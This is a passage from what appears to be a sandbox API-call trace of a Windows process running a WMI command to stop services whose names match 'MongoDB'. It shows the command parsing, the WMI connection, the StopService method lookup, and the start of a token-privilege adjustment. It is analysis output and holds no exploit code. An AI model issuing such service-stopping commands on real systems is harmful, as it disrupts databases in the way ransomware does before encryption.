| out: _Destination=0x97ad08) returned 0x0 [0304.971] free (_Block=0x970590) [0304.971] free (_Block=0x0) [0304.971] free (_Block=0x97ac78) [0304.971] lstrlenW (lpString=" path Win32_Service where \"name like '%%MongoDB%%'\" call stopservice") returned 68 [0304.971] malloc (_Size=0x34) returned 0x97b178 [0304.971] lstrlenW (lpString="\"name like '%%MongoDB%%'\"") returned 25 [0304.971] _wcsicmp (_String1="\"name like '%%MongoDB%%'\"", _String2="\"NULL\"") returned -20 [0304.971] lstrlenW (lpString="\"name like '%%MongoDB%%'\"") returned 25 [0304.971] lstrlenW (lpString="\"name like '%%MongoDB%%'\"") returned 25 [0304.971] malloc (_Size=0x34) returned 0x97b1b8 [0304.972] malloc (_Size=0x10) returned 0x97ad38 [0304.972] memmove_s (in: _Destination=0x97ad38, _DestinationSize=0xc, _Source=0x97ad08, _SourceSize=0xc | out: _Destination=0x97ad38) returned 0x0 [0304.972] free (_Block=0x97ad08) [0304.972] free (_Block=0x0) [0304.972] free (_Block=0x97b178) [0304.972] lstrlenW (lpString=" path Win32_Service where \"name like '%%MongoDB%%'\" call stopservice") returned 68 [0304.972] malloc (_Size=0xa) returned 0x97ac78 [0304.972] lstrlenW (lpString="call") returned 4 [0304.972] _wcsicmp (_String1="call", _String2="\"NULL\"") returned 65 [0304.972] malloc (_Size=0xa) returned 0x97ad08 [0304.972] malloc (_Size=0x18) returned 0x972b40 [0304.972] memmove_s (in: _Destination=0x972b40, _DestinationSize=0x10, _Source=0x97ad38, _SourceSize=0x10 | out: _Destination=0x972b40) returned 0x0 [0304.972] free (_Block=0x97ad38) [0304.972] free (_Block=0x0) [0304.972] free (_Block=0x97ac78) [0304.972] lstrlenW (lpString=" path Win32_Service where \"name like '%%MongoDB%%'\" call stopservice") returned 68 [0304.972] malloc (_Size=0x18) returned 0x972c80 [0304.972] lstrlenW (lpString="stopservice") returned 11 [0304.972] _wcsicmp (_String1="stopservice", _String2="\"NULL\"") returned 81 [0304.972] malloc (_Size=0x18) returned 0x972cc0 [0304.972] free (_Block=0x0) [0304.972] free (_Block=0x972c80) [0304.972] malloc (_Size=0x18) returned 0x972c80 [0304.972] lstrlenW (lpString="QUIT") returned 4 [0304.972] lstrlenW (lpString="path") returned 4 [0304.972] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="QUIT", cchCount2=4) returned 1 [0304.972] lstrlenW (lpString="EXIT") returned 4 [0304.973] lstrlenW (lpString="path") returned 4 [0304.973] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="EXIT", cchCount2=4) returned 3 [0304.973] free (_Block=0x972c80) [0304.973] WbemLocator:IUnknown:AddRef (This=0x6c48b8) returned 0x2 [0304.973] malloc (_Size=0x18) returned 0x972c80 [0304.973] lstrlenW (lpString="/") returned 1 [0304.973] lstrlenW (lpString="path") returned 4 [0304.973] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="/", cchCount2=1) returned 3 [0304.973] lstrlenW (lpString="-") returned 1 [0304.973] lstrlenW (lpString="path") returned 4 [0304.973] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="-", cchCount2=1) returned 3 [0304.973] lstrlenW (lpString="CLASS") returned 5 [0304.973] lstrlenW (lpString="path") returned 4 [0304.973] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="CLASS", cchCount2=5) returned 3 [0304.973] lstrlenW (lpString="PATH") returned 4 [0304.973] lstrlenW (lpString="path") returned 4 [0304.973] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="PATH", cchCount2=4) returned 2 [0304.973] lstrlenW (lpString="/") returned 1 [0304.973] lstrlenW (lpString="Win32_Service") returned 13 [0304.973] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Win32_Service", cchCount1=13, lpString2="/", cchCount2=1) returned 3 [0304.973] lstrlenW (lpString="-") returned 1 [0304.973] lstrlenW (lpString="Win32_Service") returned 13 [0304.973] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Win32_Service", cchCount1=13, lpString2="-", cchCount2=1) returned 3 [0304.973] lstrlenW (lpString="Win32_Service") returned 13 [0304.973] malloc (_Size=0x1c) returned 0x979da8 [0304.973] lstrlenW (lpString="Win32_Service") returned 13 [0304.974] wcstok (in: _String="Win32_Service", _Delimiter=".", _Context=0x3eabcd4e | out: _String="Win32_Service", _Context=0x3eabcd4e) returned="Win32_Service" [0304.974] lstrlenW (lpString="Win32_Service") returned 13 [0304.974] malloc (_Size=0x1c) returned 0x97b178 [0304.974] lstrlenW (lpString="Win32_Service") returned 13 [0304.974] wcstok (in: _String=0x0, _Delimiter=",", _Context=0x3eabcd4e | out: _String=0x0, _Context=0x3eabcd4e) returned 0x0 [0304.974] lstrlenW (lpString="") returned 0 [0304.974] lstrlenW (lpString="WHERE") returned 5 [0304.974] lstrlenW (lpString="where") returned 5 [0304.974] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="where", cchCount1=5, lpString2="WHERE", cchCount2=5) returned 2 [0304.974] lstrlenW (lpString="/") returned 1 [0304.974] lstrlenW (lpString="name like '%%MongoDB%%'") returned 23 [0304.974] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="name like '%%MongoDB%%'", cchCount1=23, lpString2="/", cchCount2=1) returned 3 [0304.974] lstrlenW (lpString="-") returned 1 [0304.974] lstrlenW (lpString="name like '%%MongoDB%%'") returned 23 [0304.975] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="name like '%%MongoDB%%'", cchCount1=23, lpString2="-", cchCount2=1) returned 3 [0304.975] lstrlenW (lpString="name like '%%MongoDB%%'") returned 23 [0304.975] malloc (_Size=0x30) returned 0x97b1f8 [0304.975] lstrlenW (lpString="name like '%%MongoDB%%'") returned 23 [0304.975] lstrlenW (lpString="/") returned 1 [0304.975] lstrlenW (lpString="call") returned 4 [0304.975] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="/", cchCount2=1) returned 3 [0304.975] lstrlenW (lpString="-") returned 1 [0304.975] lstrlenW (lpString="call") returned 4 [0304.975] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="-", cchCount2=1) returned 3 [0304.975] lstrlenW (lpString="call") returned 4 [0304.975] malloc (_Size=0xa) returned 0x97ad38 [0304.975] lstrlenW (lpString="call") returned 4 [0304.975] lstrlenW (lpString="GET") returned 3 [0304.975] lstrlenW (lpString="call") returned 4 [0304.975] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0304.975] lstrlenW (lpString="LIST") returned 4 [0304.975] lstrlenW (lpString="call") returned 4 [0304.975] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0304.975] lstrlenW (lpString="SET") returned 3 [0304.975] lstrlenW (lpString="call") returned 4 [0304.975] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0304.975] lstrlenW (lpString="CREATE") returned 6 [0304.975] lstrlenW (lpString="call") returned 4 [0304.975] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0304.975] lstrlenW (lpString="CALL") returned 4 [0304.975] lstrlenW (lpString="call") returned 4 [0304.975] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0304.976] lstrlenW (lpString="/") returned 1 [0304.976] lstrlenW (lpString="stopservice") returned 11 [0304.976] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="/", cchCount2=1) returned 3 [0304.976] lstrlenW (lpString="-") returned 1 [0304.976] lstrlenW (lpString="stopservice") returned 11 [0304.976] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="-", cchCount2=1) returned 3 [0304.976] lstrlenW (lpString="stopservice") returned 11 [0304.976] malloc (_Size=0x18) returned 0x972a00 [0304.976] lstrlenW (lpString="stopservice") returned 11 [0304.976] ??0CHString@@QAE@XZ () returned 0x47db3c [0304.976] GetCurrentThreadId () returned 0xbdc [0304.976] GetCurrentThreadId () returned 0xbdc [0304.976] ??0CHString@@QAE@XZ () returned 0x47dac4 [0304.976] malloc (_Size=0x4) returned 0x972ee8 [0304.976] malloc (_Size=0xc) returned 0x97ac78 [0304.976] malloc (_Size=0xc) returned 0x97aed0 [0304.976] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6c48b8, strNetworkResource="root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xa68518 | out: ppNamespace=0xa68518*=0x6cab38) returned 0x0 [0305.029] free (_Block=0x97aed0) [0305.029] CoSetProxyBlanket (pProxy=0x6cab38, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0305.029] free (_Block=0x972ee8) [0305.029] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0305.029] free (_Block=0x97ac78) [0305.029] malloc (_Size=0xc) returned 0x97ac78 [0305.030] IWbemServices:GetObject (in: This=0x6cab38, strObjectPath="Win32_Service", lFlags=131072, pCtx=0x0, ppObject=0x47db54*=0x0, ppCallResult=0x0 | out: ppObject=0x47db54*=0x7202a8, ppCallResult=0x0) returned 0x0 [0305.111] free (_Block=0x97ac78) [0305.111] IWbemClassObject:BeginMethodEnumeration (This=0x7202a8, lEnumFlags=0) returned 0x0 [0305.111] IWbemClassObject:NextMethod (in: This=0x7202a8, lFlags=0, pstrName=0x47db60*=0x0, ppInSignature=0x47db5c*=0x0, ppOutSignature=0x47db58*=0x0 | out: pstrName=0x47db60*="StartService", ppInSignature=0x47db5c*=0x0, ppOutSignature=0x47db58*=0x7204a0) returned 0x0 [0305.111] lstrlenW (lpString="StartService") returned 12 [0305.111] lstrlenW (lpString="stopservice") returned 11 [0305.111] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="StartService", cchCount2=12) returned 3 [0305.111] IUnknown:Release (This=0x7204a0) returned 0x0 [0305.111] IWbemClassObject:NextMethod (in: This=0x7202a8, lFlags=0, pstrName=0x47db60*=0x0, ppInSignature=0x47db5c*=0x0, ppOutSignature=0x47db58*=0x0 | out: pstrName=0x47db60*="StopService", ppInSignature=0x47db5c*=0x0, ppOutSignature=0x47db58*=0x7204a0) returned 0x0 [0305.111] lstrlenW (lpString="StopService") returned 11 [0305.111] lstrlenW (lpString="stopservice") returned 11 [0305.111] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="StopService", cchCount2=11) returned 2 [0305.112] malloc (_Size=0x38) returned 0x97b9a0 [0305.112] ??0CHString@@QAE@XZ () returned 0x47d6a4 [0305.112] GetCurrentThreadId () returned 0xbdc [0305.112] IWbemClassObject:GetNames (in: This=0x7204a0, wszQualifierName=0x0, lFlags=64, pQualifierVal=0x0, pNames=0x47d6b4 | out: pNames=0x47d6b4*="\x01ƀ\x04") returned 0x0 [0305.112] SafeArrayGetLBound (in: psa=0x720a68, nDim=0x1, plLbound=0x47d6a0 | out: plLbound=0x47d6a0) returned 0x0 [0305.112] SafeArrayGetUBound (in: psa=0x720a68, nDim=0x1, plUbound=0x47d69c | out: plUbound=0x47d69c) returned 0x0 [0305.113] SafeArrayGetElement (in: psa=0x720a68, rgIndices=0x47d6a8, pv=0x47d6b8 | out: pv=0x47d6b8) returned 0x0 [0305.113] malloc (_Size=0x24) returned 0x97b9e0 [0305.113] IWbemClassObject:GetPropertyQualifierSet (in: This=0x7204a0, wszProperty="ReturnValue", ppQualSet=0x47d5c8 | out: ppQualSet=0x47d5c8*=0x6caeb8) returned 0x0 [0305.113] malloc (_Size=0xc) returned 0x97ac78 [0305.113] IWbemQualifierSet:Get (in: This=0x6caeb8, wszName="CIMTYPE", lFlags=0, pVal=0x47d598*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x47d598*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="uint32", varVal2=0x0), plFlavor=0x0) returned 0x0 [0305.113] free (_Block=0x97ac78) [0305.113] malloc (_Size=0xc) returned 0x97ac78 [0305.113] IWbemClassObject:Get (in: This=0x7204a0, wszName="ReturnValue", lFlags=0, pVal=0x47d570*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x47d5ac*=4707732, plFlavor=0x0 | out: pVal=0x47d570*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x47d5ac*=19, plFlavor=0x0) returned 0x0 [0305.114] malloc (_Size=0xc) returned 0x97ae58 [0305.114] IWbemQualifierSet:Get (in: This=0x6caeb8, wszName="read", lFlags=0, pVal=0x47d5b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x47d5b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0305.114] free (_Block=0x97ae58) [0305.114] malloc (_Size=0xc) returned 0x97aed0 [0305.114] IWbemQualifierSet:Get (in: This=0x6caeb8, wszName="write", lFlags=0, pVal=0x47d5b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x47d5b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0305.114] free (_Block=0x97aed0) [0305.114] malloc (_Size=0xc) returned 0x97ae70 [0305.114] malloc (_Size=0xc) returned 0x97ae40 [0305.114] IWbemQualifierSet:Get (in: This=0x6caeb8, wszName="Description", lFlags=0, pVal=0x47d588*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x47d588*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0305.114] free (_Block=0x97ae40) [0305.114] malloc (_Size=0xc) returned 0x97ae40 [0305.114] lstrlenA (lpString="Not Available") returned 13 [0305.114] malloc (_Size=0x1c) returned 0x97ba10 [0305.115] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa21d94, cbMultiByte=-1, lpWideCharStr=0x97ba10, cchWideChar=14 | out: lpWideCharStr="Not Available") returned 14 [0305.115] free (_Block=0x97ba10) [0305.115] IUnknown:Release (This=0x6caeb8) returned 0x0 [0305.115] malloc (_Size=0x24) returned 0x97ba10 [0305.115] malloc (_Size=0xc) returned 0x97ae10 [0305.115] malloc (_Size=0x24) returned 0x97ba40 [0305.115] malloc (_Size=0x38) returned 0x97ba70 [0305.115] malloc (_Size=0x24) returned 0x97bab0 [0305.115] free (_Block=0x97ba40) [0305.115] free (_Block=0x97ba10) [0305.115] free (_Block=0x97b9e0) [0305.115] free (_Block=0x97ae70) [0305.115] free (_Block=0x97ae40) [0305.115] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0305.115] IWbemClassObject:GetMethodQualifierSet (in: This=0x7202a8, wszMethod="StopService", ppQualSet=0x47dabc | out: ppQualSet=0x47dabc*=0x6f4ce0) returned 0x0 [0305.116] malloc (_Size=0xc) returned 0x97aea0 [0305.116] IWbemQualifierSet:Get (in: This=0x6f4ce0, wszName="Implemented", lFlags=0, pVal=0x47daa4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x47daa4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0305.116] free (_Block=0x97aea0) [0305.116] malloc (_Size=0xc) returned 0x97aed0 [0305.116] malloc (_Size=0xc) returned 0x97ae70 [0305.116] IWbemQualifierSet:Get (in: This=0x6f4ce0, wszName="Description", lFlags=0, pVal=0x47da94*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x47da94*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The StopService method places the service in the stopped state. It returns an integer value of 0 if the service was successfully stopped, 1 if the request is not supported, and any other number to indicate an error. It returns one of the following integer values:\n0 - The request was accepted.\n1 - The request is not supported.\n2 - The user did not have the necessary access.\n3 - The service cannot be stopped because other services that are running are dependent on it.\n4 - The requested control code is not valid, or it is unacceptable to the service.\n5 - The requested control code cannot be sent to the service because the state of the service (Win32_BaseService:State) is equal to 0, 1, or 2.\n6 - The service has not been started.\n7 - The service did not respond to the start request in a timely fashion.\n8 - Unknown failure when starting the service.\n9 - The directory path to the service executable was not found.\n10 - The service is already running.\n11 - The database to add a new service is locked.\n12 - A dependency for which this service relies on has been removed from the system.\n13 - The service failed to find the service needed from a dependent service.\n14 - The service has been disabled from the system.\n15 - The service does not have the correct authentication to run on the system.\n16 - This service is being removed from the system.\n17 - There is no execution thread for the service.\n18 - There are circular dependencies when starting the service.\n19 - There is a service running under the same name.\n20 - There are invalid characters in the name of the service.\n21 - Invalid parameters have been passed to the service.\n22 - The account, which this service is to run under is either invalid or lacks the permissions to run the service.\n23 - The service exists in the database of services available from the system.\n24 - The service is currently paused in the system.\nOther - For integer values other than those listed above, refer to Win32 error code documentation.", varVal2=0x0), plFlavor=0x0) returned 0x0 [0305.117] free (_Block=0x97ae70) [0305.117] malloc (_Size=0xc) returned 0x97ae58 [0305.117] IUnknown:Release (This=0x6f4ce0) returned 0x0 [0305.117] malloc (_Size=0x38) returned 0x97b9e0 [0305.117] malloc (_Size=0x38) returned 0x97ba20 [0305.117] malloc (_Size=0x24) returned 0x97bae0 [0305.117] malloc (_Size=0xc) returned 0x97ae70 [0305.117] malloc (_Size=0x38) returned 0x97bb10 [0305.117] malloc (_Size=0x38) returned 0x97bb50 [0305.117] malloc (_Size=0x24) returned 0x97bb90 [0305.117] malloc (_Size=0x28) returned 0x97bbc0 [0305.117] malloc (_Size=0x38) returned 0x97bbf0 [0305.117] malloc (_Size=0x38) returned 0x97bc30 [0305.117] malloc (_Size=0x24) returned 0x97bc70 [0305.117] free (_Block=0x97bb90) [0305.118] free (_Block=0x97bb50) [0305.118] free (_Block=0x97bb10) [0305.118] free (_Block=0x97bae0) [0305.118] free (_Block=0x97ba20) [0305.118] free (_Block=0x97b9e0) [0305.118] IUnknown:Release (This=0x7204a0) returned 0x0 [0305.118] free (_Block=0x97bab0) [0305.118] free (_Block=0x97ba70) [0305.118] free (_Block=0x97b9a0) [0305.118] IWbemClassObject:NextMethod (in: This=0x7202a8, lFlags=0, pstrName=0x47db60*=0x0, ppInSignature=0x47db5c*=0x0, ppOutSignature=0x47db58*=0x0 | out: pstrName=0x47db60*="PauseService", ppInSignature=0x47db5c*=0x0, ppOutSignature=0x47db58*=0x722dd0) returned 0x0 [0305.118] lstrlenW (lpString="PauseService") returned 12 [0305.118] lstrlenW (lpString="stopservice") returned 11 [0305.118] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="PauseService", cchCount2=12) returned 3 [0305.118] IUnknown:Release (This=0x722dd0) returned 0x0 [0305.118] IWbemClassObject:NextMethod (in: This=0x7202a8, lFlags=0, pstrName=0x47db60*=0x0, ppInSignature=0x47db5c*=0x0, ppOutSignature=0x47db58*=0x0 | out: pstrName=0x47db60*="ResumeService", ppInSignature=0x47db5c*=0x0, ppOutSignature=0x47db58*=0x722dd0) returned 0x0 [0305.118] lstrlenW (lpString="ResumeService") returned 13 [0305.118] lstrlenW (lpString="stopservice") returned 11 [0305.118] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="ResumeService", cchCount2=13) returned 3 [0305.119] IUnknown:Release (This=0x722dd0) returned 0x0 [0305.119] IWbemClassObject:NextMethod (in: This=0x7202a8, lFlags=0, pstrName=0x47db60*=0x0, ppInSignature=0x47db5c*=0x0, ppOutSignature=0x47db58*=0x0 | out: pstrName=0x47db60*="InterrogateService", ppInSignature=0x47db5c*=0x0, ppOutSignature=0x47db58*=0x722dd0) returned 0x0 [0305.119] lstrlenW (lpString="InterrogateService") returned 18 [0305.119] lstrlenW (lpString="stopservice") returned 11 [0305.119] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="InterrogateService", cchCount2=18) returned 3 [0305.119] IUnknown:Release (This=0x722dd0) returned 0x0 [0305.119] IWbemClassObject:NextMethod (in: This=0x7202a8, lFlags=0, pstrName=0x47db60*=0x0, ppInSignature=0x47db5c*=0x0, ppOutSignature=0x47db58*=0x0 | out: pstrName=0x47db60*="UserControlService", ppInSignature=0x47db5c*=0x7204a0, ppOutSignature=0x47db58*=0x722fe8) returned 0x0 [0305.119] lstrlenW (lpString="UserControlService") returned 18 [0305.119] lstrlenW (lpString="stopservice") returned 11 [0305.119] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="UserControlService", cchCount2=18) returned 1 [0305.120] IUnknown:Release (This=0x7204a0) returned 0x0 [0305.120] IUnknown:Release (This=0x722fe8) returned 0x0 [0305.120] IWbemClassObject:NextMethod (in: This=0x7202a8, lFlags=0, pstrName=0x47db60*=0x0, ppInSignature=0x47db5c*=0x0, ppOutSignature=0x47db58*=0x0 | out: pstrName=0x47db60*="Create", ppInSignature=0x47db5c*=0x7204a0, ppOutSignature=0x47db58*=0x724f28) returned 0x0 [0305.120] lstrlenW (lpString="Create") returned 6 [0305.120] lstrlenW (lpString="stopservice") returned 11 [0305.120] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Create", cchCount2=6) returned 3 [0305.120] IUnknown:Release (This=0x7204a0) returned 0x0 [0305.120] IUnknown:Release (This=0x724f28) returned 0x0 [0305.120] IWbemClassObject:NextMethod (in: This=0x7202a8, lFlags=0, pstrName=0x47db60*=0x0, ppInSignature=0x47db5c*=0x0, ppOutSignature=0x47db58*=0x0 | out: pstrName=0x47db60*="Change", ppInSignature=0x47db5c*=0x7204a0, ppOutSignature=0x47db58*=0x724ca8) returned 0x0 [0305.121] lstrlenW (lpString="Change") returned 6 [0305.121] lstrlenW (lpString="stopservice") returned 11 [0305.121] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Change", cchCount2=6) returned 3 [0305.121] IUnknown:Release (This=0x7204a0) returned 0x0 [0305.121] IUnknown:Release (This=0x724ca8) returned 0x0 [0305.121] IWbemClassObject:NextMethod (in: This=0x7202a8, lFlags=0, pstrName=0x47db60*=0x0, ppInSignature=0x47db5c*=0x0, ppOutSignature=0x47db58*=0x0 | out: pstrName=0x47db60*="ChangeStartMode", ppInSignature=0x47db5c*=0x7204a0, ppOutSignature=0x47db58*=0x7230c8) returned 0x0 [0305.121] lstrlenW (lpString="ChangeStartMode") returned 15 [0305.121] lstrlenW (lpString="stopservice") returned 11 [0305.121] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="ChangeStartMode", cchCount2=15) returned 3 [0305.121] IUnknown:Release (This=0x7204a0) returned 0x0 [0305.121] IUnknown:Release (This=0x7230c8) returned 0x0 [0305.121] IWbemClassObject:NextMethod (in: This=0x7202a8, lFlags=0, pstrName=0x47db60*=0x0, ppInSignature=0x47db5c*=0x0, ppOutSignature=0x47db58*=0x0 | out: pstrName=0x47db60*="Delete", ppInSignature=0x47db5c*=0x0, ppOutSignature=0x47db58*=0x6f62d8) returned 0x0 [0305.121] lstrlenW (lpString="Delete") returned 6 [0305.121] lstrlenW (lpString="stopservice") returned 11 [0305.121] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Delete", cchCount2=6) returned 3 [0305.123] IUnknown:Release (This=0x6f62d8) returned 0x0 [0305.123] IWbemClassObject:NextMethod (in: This=0x7202a8, lFlags=0, pstrName=0x47db60*=0x0, ppInSignature=0x47db5c*=0x0, ppOutSignature=0x47db58*=0x0 | out: pstrName=0x47db60*="GetSecurityDescriptor", ppInSignature=0x47db5c*=0x0, ppOutSignature=0x47db58*=0x7204a0) returned 0x0 [0305.123] lstrlenW (lpString="GetSecurityDescriptor") returned 21 [0305.123] lstrlenW (lpString="stopservice") returned 11 [0305.123] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="GetSecurityDescriptor", cchCount2=21) returned 3 [0305.123] IUnknown:Release (This=0x7204a0) returned 0x0 [0305.123] IWbemClassObject:NextMethod (in: This=0x7202a8, lFlags=0, pstrName=0x47db60*=0x0, ppInSignature=0x47db5c*=0x0, ppOutSignature=0x47db58*=0x0 | out: pstrName=0x47db60*="SetSecurityDescriptor", ppInSignature=0x47db5c*=0x7204a0, ppOutSignature=0x47db58*=0x722f58) returned 0x0 [0305.123] lstrlenW (lpString="SetSecurityDescriptor") returned 21 [0305.123] lstrlenW (lpString="stopservice") returned 11 [0305.123] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="SetSecurityDescriptor", cchCount2=21) returned 3 [0305.123] IUnknown:Release (This=0x7204a0) returned 0x0 [0305.123] IUnknown:Release (This=0x722f58) returned 0x0 [0305.124] IWbemClassObject:NextMethod (in: This=0x7202a8, lFlags=0, pstrName=0x47db60*=0x0, ppInSignature=0x47db5c*=0x0, ppOutSignature=0x47db58*=0x0 | out: pstrName=0x47db60*=0x0, ppInSignature=0x47db5c*=0x0, ppOutSignature=0x47db58*=0x0) returned 0x40005 [0305.124] IUnknown:Release (This=0x7202a8) returned 0x0 [0305.125] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0305.125] lstrlenW (lpString="SET") returned 3 [0305.125] lstrlenW (lpString="call") returned 4 [0305.125] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0305.125] lstrlenW (lpString="CREATE") returned 6 [0305.125] lstrlenW (lpString="call") returned 4 [0305.125] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0305.125] free (_Block=0x972c80) [0305.125] malloc (_Size=0x4) returned 0x972ee8 [0305.125] lstrlenW (lpString="GET") returned 3 [0305.125] lstrlenW (lpString="call") returned 4 [0305.125] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0305.125] lstrlenW (lpString="LIST") returned 4 [0305.125] lstrlenW (lpString="call") returned 4 [0305.125] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0305.125] lstrlenW (lpString="ASSOC") returned 5 [0305.125] lstrlenW (lpString="call") returned 4 [0305.125] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="ASSOC", cchCount2=5) returned 3 [0305.125] WbemLocator:IUnknown:AddRef (This=0x6c48b8) returned 0x3 [0305.126] free (_Block=0x972788) [0305.126] lstrlenW (lpString="") returned 0 [0305.126] lstrlenW (lpString="NQDPDE") returned 6 [0305.126] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="", cchCount2=0) returned 3 [0305.126] lstrlenW (lpString="NQDPDE") returned 6 [0305.126] malloc (_Size=0xe) returned 0x97ae88 [0305.126] lstrlenW (lpString="NQDPDE") returned 6 [0305.126] GetCurrentThreadId () returned 0xbdc [0305.126] GetCurrentProcess () returned 0xffffffff [0305.126] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x47fc3c | out: TokenHandle=0x47fc3c*=0x2f8) returned 1 [0305.126] GetTokenInformation (in: TokenHandle=0x2f8, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x47fc38 | out: TokenInformation=0x0, ReturnLength=0x47fc38) returned 0 [0305.126] malloc (_Size=0x118) returned 0x97b9a0 [0305.126] GetTokenInformation (in: TokenHandle=0x2f8, TokenInformationClass=0x3, TokenInformation=0x97b9a0, TokenInformationLength=0x118, ReturnLength=0x47fc38 | out: TokenInformation=0x97b9a0, ReturnLength=0x47fc38) returned 1 [0305.126] AdjustTokenPrivileges (in: TokenHandle=0x2f8, DisableAllPrivileges=0, NewState=0x97b9a0*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), 